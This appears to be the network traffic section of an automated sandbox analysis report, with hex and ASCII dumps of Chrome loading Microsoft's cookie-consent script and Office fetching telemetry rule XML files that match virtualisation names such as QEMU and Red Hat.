                                                                                2024-10-04 09:34:03 UTC16384INData Raw: 28 65 5b 67 76 5d 3d 30 29 2c 65 5b 76 76 5d 7c 7c 28 65 5b 76 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 68 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 76 76 5d 3d 33 2c 65 5b 68 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 59 69 28 65 29 29 2c 48 5b 5a 67 5d 28 43 76 2e 63 72 65 61 74 65 28 65 5b 43 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 68 76 5d 3f 31 3a 65 5b 68 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 76 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f 61 3d 21 43 28 65 2c 74 29 3a 28 72 3d 31 2c 69 3d 32 30 2c 34 3d 3d 3d 6e 26 26 28 72 3d 34 2c 69 3d 31 29 2c 61 3d 21 30 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 66 6f
                                                                                Data Ascii: (e[gv]=0),e[vv]||(e[vv]=1),l(e),e[hv])if(U||ae)e[vv]=3,e[hv]=!1;else if(H)return W&&(e=Yi(e)),H[Zg](Cv.create(e[Cg],[e]),!0===e[hv]?1:e[hv],3);var n=e[vv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?a=!C(e,t):(r=1,i=20,4===n&&(r=4,i=1),a=!0,function(e,t,n,r){fo


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                64192.168.2.55545513.107.253.454436020C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:03 UTC551OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                Host: wcpstatic.microsoft.com
                                                                                Connection: keep-alive
                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                sec-ch-ua-mobile: ?0
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                sec-ch-ua-platform: "Windows"
                                                                                Accept: */*
                                                                                Sec-Fetch-Site: same-site
                                                                                Sec-Fetch-Mode: no-cors
                                                                                Sec-Fetch-Dest: script
                                                                                Referer: https://learn.microsoft.com/
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                2024-10-04 09:34:03 UTC712INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:03 GMT
                                                                                Content-Type: application/javascript
                                                                                Content-Length: 52717
                                                                                Connection: close
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                Age: 1074
                                                                                Cache-Control: max-age=43200
                                                                                Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                Etag: 0x8DA85F6F74C6D08
                                                                                Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                Vary: Accept-Encoding
                                                                                X-Cache: CONFIG_NOCACHE
                                                                                x-ms-blob-type: BlockBlob
                                                                                x-ms-lease-status: unlocked
                                                                                x-ms-request-id: f1a459c7-101e-0052-643e-165c72000000
                                                                                x-ms-version: 2009-09-19
                                                                                x-azure-ref: 20241004T093403Z-1767f7688dctps2t8qk28fz8yg0000000mag000000004qh5
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:03 UTC15672INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
                                                                                2024-10-04 09:34:03 UTC16384INData Raw: 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3c 2f 67 2c 22 26 6c 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3e 2f 67 2c 22 26 67 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22 26 23 30 33 39 3b 22 29 3a 22 22 7d 2c 65 7d 28 29 2c 61 3d 6e 2e 6c 6f 63 61 6c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6f 2c 6e 2c 72 2c 69 2c 61 29 7b 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 46 6f 63 75 73 45 6c 65 6d 65 6e 74 42 65 66 6f 72 65 50 6f 70 75 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6f 6b 69 65
                                                                                Data Ascii: {return e?e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#039;"):""},e}(),a=n.locals,l=function(){function e(e,t,o,n,r,i,a){this.direction="ltr",this.previousFocusElementBeforePopup=null,this.cookie
                                                                                2024-10-04 09:34:03 UTC711INData Raw: 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61 62 65 6c 3a 68 6f 76 65 72 3a 3a 61 66 74 65 72 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61
                                                                                Data Ascii: r"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + label:hover::after {\n background-color: "+e["radio-button-hover-background-color"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + la
                                                                                2024-10-04 09:34:03 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 7d 2c 65 7d 28 29 2c 64 3d 5b 22 61 72 22 2c 22 68 65 22 2c 22 70 73 22 2c 22 75 72 22 2c 22 66 61 22 2c 22 70 61 22 2c 22 73 64 22 2c 22 74 6b 22 2c 22 75 67 22 2c 22 79 69 22 2c 22 73 79 72 22 2c 22 6b 73 2d 61 72 61 62 22 5d 2c 75 3d 7b 22 63 6c 6f 73 65 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 22 3a 22 23 36 36 36 36 36 36 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 6f 70 61 63 69 74 79 22 3a 22 31 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e
                                                                                Data Ascii: background-color: "+e["radio-button-disabled-color"]+" !important;\n }"},e}(),d=["ar","he","ps","ur","fa","pa","sd","tk","ug","yi","syr","ks-arab"],u={"close-button-color":"#666666","secondary-button-disabled-opacity":"1","secondary-button
                                                                                2024-10-04 09:34:03 UTC3566INData Raw: 22 2d 22 29 5b 30 5d 3b 6f 3d 65 2e 73 70 6c 69 74 28 22 2d 22 29 5b 30 5d 3d 3d 3d 6e 7d 72 65 74 75 72 6e 20 6f 7d 28 65 2c 63 29 7d 29 29 3b 73 26 26 30 3d 3d 3d 73 2e 6c 65 6e 67 74 68 26 26 28 65 3d 22 65 6e 2d 55 53 22 29 2c 6f 2e 70 6c 61 63 65 68 6f 6c 64 65 72 45 6c 65 6d 65 6e 74 3d 6c 2c 72 26 26 6f 2e 63 6f 6e 73 65 6e 74 43 68 61 6e 67 65 64 43 61 6c 6c 62 61 63 6b 73 2e 72 65 67 69 73 74 65 72 43 61 6c 6c 62 61 63 6b 28 72 29 2c 6f 2e 73 61 76 65 43 6f 6f 6b 69 65 28 29 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 3d 6e 65 77 20 66 28 21 31 29 2c 6e 75 6c 6c 3d 3d 6e 7c 7c 6e 28 76 6f 69 64 20 30 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 29 2c 6f 2e 69 73 49 6e 69 74 52 65 61 64 79 3d 21 30 2c 74 68 69 73 2e 63 6f 6e 73 65 6e 74 43 68 61 6e 67
                                                                                Data Ascii: "-")[0];o=e.split("-")[0]===n}return o}(e,c)}));s&&0===s.length&&(e="en-US"),o.placeholderElement=l,r&&o.consentChangedCallbacks.registerCallback(r),o.saveCookie(),o.siteConsent=new f(!1),null==n||n(void 0,o.siteConsent),o.isInitReady=!0,this.consentChang


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                65192.168.2.55545813.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:03 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:03 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:03 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 474
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                ETag: "0x8DC582BB3F48DAE"
                                                                                x-ms-request-id: 1cc309a5-e01e-0071-358c-1508e7000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093403Z-15767c5fc55qdcd62bsn50hd6s0000000c4g000000004ydx
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:03 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                66192.168.2.55545913.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:03 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:03 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:03 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 408
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                ETag: "0x8DC582BB9B6040B"
                                                                                x-ms-request-id: 04c46130-501e-0064-028c-151f54000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093403Z-15767c5fc55v7j95gq2uzq37a00000000chg000000005vwb
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:03 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                67192.168.2.55545713.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:03 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:03 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:03 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 407
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                ETag: "0x8DC582B9D30478D"
                                                                                x-ms-request-id: 285c7e33-c01e-008e-718c-157381000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093403Z-15767c5fc55rg5b7sh1vuv8t7n0000000cn0000000007s7h
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:03 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                68192.168.2.55544913.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:03 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:03 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:03 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 411
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                ETag: "0x8DC582B989AF051"
                                                                                x-ms-request-id: be018b72-401e-0035-7e8c-1582d8000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093403Z-15767c5fc55xsgnlxyxy40f4m00000000c9g0000000033ks
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:03 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                69192.168.2.55546413.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:03 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:03 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:03 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 469
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                ETag: "0x8DC582BB3CAEBB8"
                                                                                x-ms-request-id: 6a902a44-301e-005d-788c-15e448000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093403Z-15767c5fc55tsfp92w7yna557w0000000ccg000000003kxg
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:03 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                70192.168.2.55546613.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:04 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:04 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:04 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 416
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                ETag: "0x8DC582BB5284CCE"
                                                                                x-ms-request-id: 15fe14b4-a01e-0002-638c-155074000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093404Z-15767c5fc55rv8zjq9dg0musxg0000000ccg000000003dk4
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:04 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                71192.168.2.55546513.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:04 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:04 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:04 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 472
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                ETag: "0x8DC582B91EAD002"
                                                                                x-ms-request-id: 4da5c882-a01e-0070-628c-15573b000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093404Z-15767c5fc55d6fcl6x6bw8cpdc0000000c9g0000000033b7
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
